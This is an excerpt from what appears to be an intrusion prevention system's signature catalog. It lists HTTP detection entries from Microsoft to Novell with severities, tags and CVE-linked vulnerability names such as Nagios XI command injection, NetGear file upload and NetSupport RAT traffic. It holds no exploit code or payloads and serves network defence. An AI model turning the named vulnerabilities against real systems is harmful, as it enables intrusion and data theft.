Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft XML Core Services, MS2008-11, CVE2008, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-525-5211
Vulnerability: Microsoft-Xml-Core-Services-Msxml-Header-Request-Information-Disclosure
Description:
Back to top

HTTP_CS-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952

About this situation: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Sharepoint, MS2020-10, CVE2020, Windows not specific, Microsoft Sharepoint not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1290-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952
Description:
Back to top

HTTP_CS-MikroTik-RouterOS-Authentication-Bypass

About this situation: An attempt to exploit a vulnerability in MikroTik RouterOS detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, MikroTik, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Vulnerability: MikroTik-RouterOS-Authentication-Bypass
Description:
Back to top

HTTP_CS-Minishare-1.4.1-Buffer-Overflow

About this situation: Minishare 1.4.1 Buffer Overflow
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Minishare Web Server, CVE2004, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Minishare-1.4.1-Buffer-Overflow
Description:
Back to top

HTTP_CS-MirrorBlast-Malware-Infection-Traffic

About this situation: MirrorBlast malware infection traffic detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1392-5242
Last changed: sgpkg-ips-1394-5242
Vulnerability: MirrorBlast-Malware-Infection-Traffic
Description:
Back to top

HTTP_CS-Mofei.P-Traffic

About this situation: A suspicious traffic pattern detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-691-5211
Last changed: sgpkg-ips-691-5211
Vulnerability: Win32.Worm.Mofei.P-Botnet
Description:
Back to top

HTTP_CS-Monitorr-Unauthenticated-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Monitorr detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Unix, Linux, Any Hardware, Monitorr, CVE2020, Windows not specific, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: Monitorr-Unauthenticated-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Moodle-Admin-Shell-Upload

About this situation: An attempt to exploit a vulnerability in Moodle detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Moodle, CVE2019, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Vulnerability: Moodle-Admin-Shell-Upload
Description:
Back to top

HTTP_CS-MosConfig-Code-Injection-Remote-Compromise-2

About this situation: An attempt to exploit a vulnerability in Joomla!
Context: HTTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Joomla, CVE2010, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-336-4219
Vulnerability: MosConfig-Absolute-Path-Remote-File-Include-Vulnerability
Description:
Back to top

HTTP_CS-Motorola-WR850G-Authentication-Bypass

About this situation: An attempt to exploit a Motorola WR850G Authentication Bypass vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Motorola Router, CVE2004, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-737-5211
Vulnerability: Motorola-WR850G-Authentication-Bypass
Description:
Back to top

HTTP_CS-Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Mozilla Foundation Firefox ESR detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mozilla Firefox, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1096-5242
Last changed: sgpkg-ips-1096-5242
Vulnerability: Mozilla-Firefox-Webextensions-Settingcontent.Ms-Policy-Bypass
Description:
Back to top

HTTP_CS-MS-IIS-HTTP-TRACK-Logging-Failure

About this situation: Attempt to obtain sensitive information from MS IIS
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, IIS 5.0, IIS 4.0, Windows not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-148-2032
Vulnerability: MS-IIS-HTTP-TRACK-Logging-Failure
Description:
Back to top

HTTP_CS-MSADCS-Content-Type-BOF

About this situation: Buffer overflow attempt against msadcs.dll in MDAC
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, Microsoft SQL Server 2000, Microsoft SQL Server 7.0, Internet Explorer 5.0, Internet Explorer 6.0, Internet Explorer 5.5, MS2002, CVE2002, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-Mdac-Buffer-Overflow
Description:
Back to top

HTTP_CS-MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861

About this situation: A vulnerability in Microsoft Internet Explorer
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Internet Explorer, MS2013-10, CVE2013, Windows not specific, Internet Explorer not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-544-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: MSIE-JSON-Parsing-Vulnerability-CVE-2013-3861
Description:
Back to top

HTTP_CS-MSN-Login

About this situation: MSN Messenger login attempt over HTTP
Context: HTTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, MSN Messenger, Windows not specific, Instant Messaging, TCP Client Traffic
First detected in: sgpkg-ips-37-1210
Last changed: sgpkg-ips-516-5211
Vulnerability: MSN-Messenger-Usage
Description:
Back to top

HTTP_CS-MSNBot-Web-Spider

About this situation: MSNBot web spider detected
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Microsoft MSNBot, Any Operating System not specific, Browsers, TCP Client Traffic
First detected in: sgpkg-ips-272-4219
Last changed: sgpkg-ips-272-4219
Vulnerability: HTTP-Browser-Usage
Description:
Back to top

HTTP_CS-Multipart-Filename-Potential-Directory-Traversal

About this situation: Upload of a file with a name that includes a potential directory traversal
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1794-5242
Last changed: sgpkg-ips-1794-5242
Description:
Back to top

HTTP_CS-Multiple-Host-Headers

About this situation: Multiple host headers were seen
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Protocol Violations, Anomalies, TCP Client Traffic
First detected in: sgpkg-ips-782-5211
Last changed: sgpkg-ips-782-5211
Description:
Back to top

HTTP_CS-Multiple-Illegal-Url-Characters

About this situation: Suspicious request activity has been detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Description:
Back to top

HTTP_CS-Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Apple Common UNIX Printing System detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Common UNIX Printing System, CVE2008, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-471-5211
Vulnerability: Multiple-Vendors-CUPS-Hpgl-Filter-Remote-Code-Execution
Description:
Back to top

HTTP_CS-Mutiny-Arbitrary-File-Upload

About this situation: An attempt to exploit a Mutiny Arbitrary File Upload vulnerability detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Mutiny, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-705-5211
Vulnerability: Mutiny-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407

About this situation: An attempt to exploit a vulnerability in MyPRO Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, mySCADA myPRO, CVE2024, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: mySCADA-myPRO-Manager-Unauthenticated-Command-Injection-CVE-2024-47407
Description:
Back to top

HTTP_CS-Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Nagios Network Analyzer detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Nagios-Network-Analyzer-Create-Cross-Site-Request-Forgery
Description:
Back to top

HTTP_CS-Nagios-XI-Authenticated-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Nagios XI, CVE2019, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Nagios-XI-Authenticated-Remote-Command-Execution
Description:
Back to top

HTTP_CS-Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1398-5242
Last changed: sgpkg-ips-1398-5242
Vulnerability: Nagios-XI-Cmdsubsys.php-Archive-Name-Command-Injection
Description:
Back to top

HTTP_CS-Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload

About this situation: An attempt to exploit a vulnerability in Nagios XI detected.
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Nagios XI, CVE2021, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Nagios-XI-Custom-Includes-Component-Arbitrary-File-Upload
Description:
Back to top

HTTP_CS-Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1346-5242
Vulnerability: Nagios-XI-Monitoringplugins-Do_Upload-Command-Injection
Description:
Back to top

HTTP_CS-Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, Nagios XI, CVE2020, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Vulnerability: Nagios-XI-Snmptrap-Authenticated-Remote-Code-Exection
Description:
Back to top

HTTP_CS-Nagios-XI-Windows-Winrm-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Nagios-XI--Windows-Winrm-Command-Injection
Description:
Back to top

HTTP_CS-Necta-LLC-WiFi-Mouse-RCE

About this situation: An attempt to exploit a vulnerability in the Necta LLC Wifi Mouse server detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Necta LLC, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: Necta-LLC-WiFi-Mouse-RCE
Description:
Back to top

HTTP_CS-NetAlertX-Unauthenticated-Arbitrary-File-Read

About this situation: An attempt to exploit a vulnerability in NetAlertX detected
Context: HTTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, NetAlertX, CVE2024, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Vulnerability: NetAlertX-Unauthenticated-Arbitrary-File-Read
Description:
Back to top

HTTP_CS-NetData-Streaming-Alert-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netdata netdata detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetData, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1559-5242
Last changed: sgpkg-ips-1559-5242
Vulnerability: NetData-Streaming-Alert-Command-Injection
Description:
Back to top

HTTP_CS-Netgate-Pfsense-Restore_rrddata-Command-Injection

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netgate pfSense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Vulnerability: Netgate-Pfsense-Restore_rrddata-Command-Injection
Description:
Back to top

HTTP_CS-NetGear-DGN2200-dnslookup.cgi-Command-Injection

About this situation: A NetGear DGN2200 dnslookup.cgi Command Injection vulnerability
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1025-5242
Last changed: sgpkg-ips-1721-5242
Vulnerability: NetGear-DGN2200-dnslookup.cgi-Command-Injection
Description:
Back to top

HTTP_CS-NetGear-NMS300-Fileuploadutils-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1354-5242
Vulnerability: NetGear-NMS300-Fileuploadutils-Directory-Traversal
Description:
Back to top

HTTP_CS-NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1352-5242
Last changed: sgpkg-ips-1352-5242
Vulnerability: NetGear-NMS300-Mfileuploadcontroller-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload

About this situation: An attempt to exploit a vulnerability in Netgear ProSAFE NMS300 detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear NMS300, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1715-5242
Vulnerability: NetGear-ProSafe-NMS300-Uploadservlet-Unrestricted-File-Upload
Description:
Back to top

HTTP_CS-NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset

About this situation: An attempt to exploit a vulnerability in NetGear R6700v3 routers detected.
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, NetGear, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Vulnerability: NetGear-R6700v3-Unauthenticated-Lan-Admin-Password-Reset
Description:
Back to top

HTTP_CS-NetMotion-Mobility-Server-MvcUtil-Java-Deserialization

About this situation: An attempt to exploit a vulnerability in NetMotion Mobility Server detected.
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, NetMotion Mobility Server, CVE2021, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1368-5242
Last changed: sgpkg-ips-1368-5242
Vulnerability: NetMotion-Mobility-Server-MvcUtil-Java-Deserialization
Description:
Back to top

HTTP_CS-Netscape-Enterprice-Server-Revlog-DoS

About this situation: Netscape Enterprise Server Revlog Denial of Service
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Netscape Enterprise Server, CVE2001, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-148-2032
Vulnerability: HTTP-Netscape-Enterprise-Server-Revlog-DoS
Description:
Back to top

HTTP_CS-NetSupport-RAT-Infection-Traffic

About this situation: NetSupport RAT infection traffic was detected
Context: HTTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1360-5242
Last changed: sgpkg-ips-1360-5242
Vulnerability: NetSupport-RAT-Infection-Traffic
Description:
Back to top

HTTP_CS-Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection

About this situation: An attempt to exploit a vulnerability in Netsweeper WebAdmin detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netsweeper WebAdmin, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1711-5242
Vulnerability: Netsweeper-WebAdmin-unixlogin.php-Python-Code-Injection
Description:
Back to top

HTTP_CS-Netwin-CWMail-ShellCode-Detect

About this situation: ShellCode detection in Netwin CWMail
Context: HTTP Client Stream
Severity: 10
Tags: Windows, Any Hardware, NetWin CWMail, CVE2002, Windows not specific, Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-640-5211
Vulnerability: HTTP-Netwin-CWMail-Buffer-Overflow
Description:
Back to top

HTTP_CS-Netwin-SurgeMail-Header-Line-BOF

About this situation: Attempt to exploit a buffer overflow by sending lots of headers
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Netwin SurgeMail, CVE2008, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-341-4219
Last changed: sgpkg-ips-1740-5242
Vulnerability: Netwin-SurgeMail-Webmail-Multiple-Header-Memory-Corruption
Description:
Back to top

HTTP_CS-No-User-Agent-Provided-In-HTTP-Headers

About this situation: A client did not provide the customary User-Agent in a HTTP Headers
Context: HTTP Client Stream
Severity: 1
Tags: Any Operating System, Any Hardware, Any Software, Any Operating System not specific, Any Software not specific, Protocol Information, TCP Client Traffic
First detected in: sgpkg-ips-1641-5242
Last changed: sgpkg-ips-1641-5242
Description:
Back to top

HTTP_CS-Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Node.js Node.js detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Node.js, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1036-5242
Last changed: sgpkg-ips-1036-5242
Vulnerability: Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service
Description:
Back to top

HTTP_CS-nopCommerce-nopCommerce-BackupAction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in nopCommerce detected.
Context: HTTP Client Stream
Severity: 7
Tags: Unix, Linux, Any Hardware, nopCommerce, CVE2022, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1467-5242
Last changed: sgpkg-ips-1467-5242
Vulnerability: nopCommerce-nopCommerce-BackupAction-Directory-Traversal
Description:
Back to top

HTTP_CS-Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Nostromo nhttpd detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Nostromo, CVE2019, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1212-5242
Last changed: sgpkg-ips-1699-5242
Vulnerability: Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow
Description:
Back to top

HTTP_CS-Novell-eDirectory-HTTP-Headers-Denial-Of-Service

About this situation: Attempt to exploit a resource exhaustion vulnerability in Novell eDirectory detected
Context: HTTP Client Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Novell eDirectory, CVE2008, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-418-4219
Vulnerability: HTTP-Novell-eDirectory-HTTP-Headers-Denial-Of-Service
Description:
Back to top

HTTP_CS-Novell-eDirectory-Server-Accept-Language-Buffer-Overflow

About this situation: Buffer overflow exploit attempt against Novell eDirectory Server
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell eDirectory, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-507-5211
Vulnerability: Novell-eDirectory-Server-Accept-Language-Buffer-Overflow
Description:
Back to top

HTTP_CS-Novell-File-Reporter-SRS-Arbitrary-File-Retrieval

About this situation: An attempt to exploit a vulnerability in Novell File Reporter detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell File Reporter, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-499-5211
Vulnerability: Novell-File-Reporter-SRS-Arbitrary-File-Retrieval
Description:
Back to top

HTTP_CS-Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Novell GroupWise detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell GroupWise, CVE2014, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-1378-5242
Vulnerability: Novell-Groupwise-Admin-Service-Fileuploadservlet-Directory-Traversal
Description:
Back to top

HTTP_CS-Novell-iManager-Servlet-Modulemanager-Upload-Vulnerability

About this situation: Attempt to exploit Upload vulnerbility in Novell iManager
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell iManager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Novell-iManager-Getmultipartparameters-Unauthorized-File-Upload
Description:
Back to top

HTTP_CS-Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Novell iPrint Server detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Open Enterprise Server, Novell iPrint Server, CVE2011, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-440-4219
Vulnerability: Novell-iPrint-Server-Attributes-Natural-Language-Buffer-Overflow
Description:
Back to top

HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Novell Privileged User Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Privileged User Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-NetIQ-Privileged-User-Manager-Eval-Policy-Bypass
Description:
Back to top

HTTP_CS-Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass

About this situation: An attempt to exploit a vulnerability in Novell Privileged User Manager detected
Context: HTTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Novell Privileged User Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-494-5211
Last changed: sgpkg-ips-494-5211
Vulnerability: Novell-NetIQ-Privileged-User-Manager-Modifyaccounts-Policy-Bypass
Description:
Back to top

HTTP_CS-Novell-NetMail-WebAdmin-Username-Stack-Buffer-Overflow

